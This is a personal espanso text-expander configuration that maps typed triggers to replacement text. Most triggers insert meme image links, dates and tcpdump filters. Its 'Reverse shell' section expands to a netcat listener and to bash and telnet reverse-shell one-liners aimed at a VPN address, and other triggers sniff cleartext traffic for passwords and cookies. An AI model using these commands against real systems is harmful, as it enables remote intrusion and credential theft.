# espanso configuration file

# This is the default configuration file, change it as you like it
# You can refer to the official documentation:
# https://espanso.org/docs/

# Matches are the substitution rules, when you type the "trigger" string
# it gets replaced by the "replace" string.
toggle_key: OFF

matches:
  - trigger: "smorc"
    replace: "SMOrc"

  - trigger: "smha"
    replace: "SMOrc HahaShrugRight"

  - trigger: ":poo"
    replace: "Poooound"

  - trigger: "omg"
    replace: "https://raw.githubusercontent.com/SpectralOps/senv/master/media/omg.webp"

  - trigger: "coco"
    replace: "https://avatars.githubusercontent.com/u/9960400?v=4"

  - trigger: "пальма"
    replace: "https://static.pepper.ru/comments/content/dY6Ro/4102774.jpg"

  - trigger: ":аромат"
    replace: "https://static.pepper.ru/comments/full_screen/L2rHM/4196699.jpg"

  - trigger: "трусы"
    replace: "https://static.pepper.ru/comments/full_screen/OFWY1/4129293.jpg"

  - trigger: ":бан"
    replace: "https://static.pepper.ru/comments/full_screen/uAVQP/4142000.jpg"

  - trigger: ":botox"
    replace: "https://static.pepper.ru/comments/content/ptDax/4236493.jpg"

  # Simple text replacement
  - trigger: ":espanso"
    replace: "Hi there!"

  - trigger: ":paste"
    replace: "paste.debian.net"

  # Reverse shell
  - trigger: ":nc"
    replace: "nc -l -n -vv -p 8080"

  - trigger: ":reverse-bash"
    replace: "/bin/bash -i > /dev/tcp/{{ip}}/8080 0<&1 2>&1"
    vars:
      - name: ip
        type: match
        params:
          trigger: ":vpn"

  - trigger: ":reverse-telnet"
    replace: "mknod backpipe p && telnet {{ip}} 8080 0<backpipe"
    vars:
      - name: ip
        type: match
        params:
          trigger: ":vpn"

  # Dates
  - trigger: ":date"
    replace: "{{mydate}}"
    vars:
      - name: mydate
        type: date
        params:
          format: "%d.%m.%Y"

  # Shell commands
  - trigger: ":shell"
    replace: "{{output}}"
    vars:
      - name: output
        type: shell
        params:
          cmd: "echo Hello from your shell"

  - trigger: ":vpn"
    replace: "{{output}}"
    vars:
      - name: output
        type: shell
        params:
          cmd: ip --json address | jq --raw-output '.[] | select(.ifname == "tapvpn") | .addr_info[] | select(."family" == "inet") | .local'

  - trigger: ":lisp"
    replace: "https://i.redd.it/cp8lwaue6ca51.jpg"

  - trigger: ":pstree"
    replace: "ps -aef --forest"

  - trigger: ":repquota"
    replace: "repquota --verbose --all --no-names --group --project --human-readable"

  - trigger: ":tcpdump-ssh"
    replace: "tcpdump 'tcp[(tcp[12]>>2):4] = 0x5353482D'"

  - trigger: ":tcpdump-dns"
    replace: "tcpdump -vvAs0 port 53"

  - trigger: ":tcpdump-ftp"
    replace: "tcpdump -vvAs0 port ftp or ftp-data"

  - trigger: ":tcpdump-ntp"
    replace: "tcpdump -vvAs0 port 123"

  - trigger: ":tcpdump-pass"
    replace: "tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -lA | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd= |password=|pass:|user:|username:|password:|login:|pass |user '"

  - trigger: ":tcpdump-evil"
    replace: "tcpdump 'ip[6] & 128 != 0'"

  - trigger: ":tcpdump-http-cook"
    replace: "tcpdump -vvAls0 | grep 'Set-Cookie|Host:|Cookie:'"

  - trigger: ":tcpdump-http-head"
    replace: "tcpdump -vvAls0 | grep 'Host:'"

  - trigger: ":tcpdump-http-get"
    replace: "tcpdump -vvAls0 | grep 'GET'"

  - trigger: ":tcpdump-http-user"
    replace: "tcpdump -vvAls0 | grep 'User-Agent:'"

  - trigger: ":tcpdump-syn"
    replace: "tcpdump 'tcp[13] = 6'"

  - trigger: ":tcpdump-fin"
    replace: "tcpdump 'tcp[tcpflags] == tcp-fin' # tcpdump 'tcp[13] & 1!=0'"

  - trigger: ":tcpdump-psh"
    replace: "tcpdump 'tcp[tcpflags] == tcp-push' # tcpdump 'tcp[13] & 8!=0'"

  - trigger: ":tcpdump-ack"
    replace: "tcpdump 'tcp[tcpflags] == tcp-ack' # tcpdump 'tcp[13] & 16!=0'"

  - trigger: ":tcpdump-urg"
    replace: " tcpdump 'tcp[tcpflags] == tcp-urg' # tcpdump 'tcp[13] & 32!=0'"

  - trigger: ":tcpdump-synack"
    replace: "tcpdump 'tcp[13]=18'"

  - trigger: ":tcpdump-syn"
    replace: "tcpdump 'tcp[tcpflags] == tcp-syn' # tcpdump 'tcp[13] & 2!=0'"

  - trigger: ":tcpdump-rst"
    replace: "tcpdump 'tcp[tcpflags] == tcp-rst' # tcpdump 'tcp[13] & 4!=0'"

  - trigger: "goaccess..."
    replace: "goaccess --log-format=COMBINED"

  - trigger: "reboot..."
    replace: "sh -c 'sleep 600; echo b > /proc/sysrq-trigger; reboot' &"
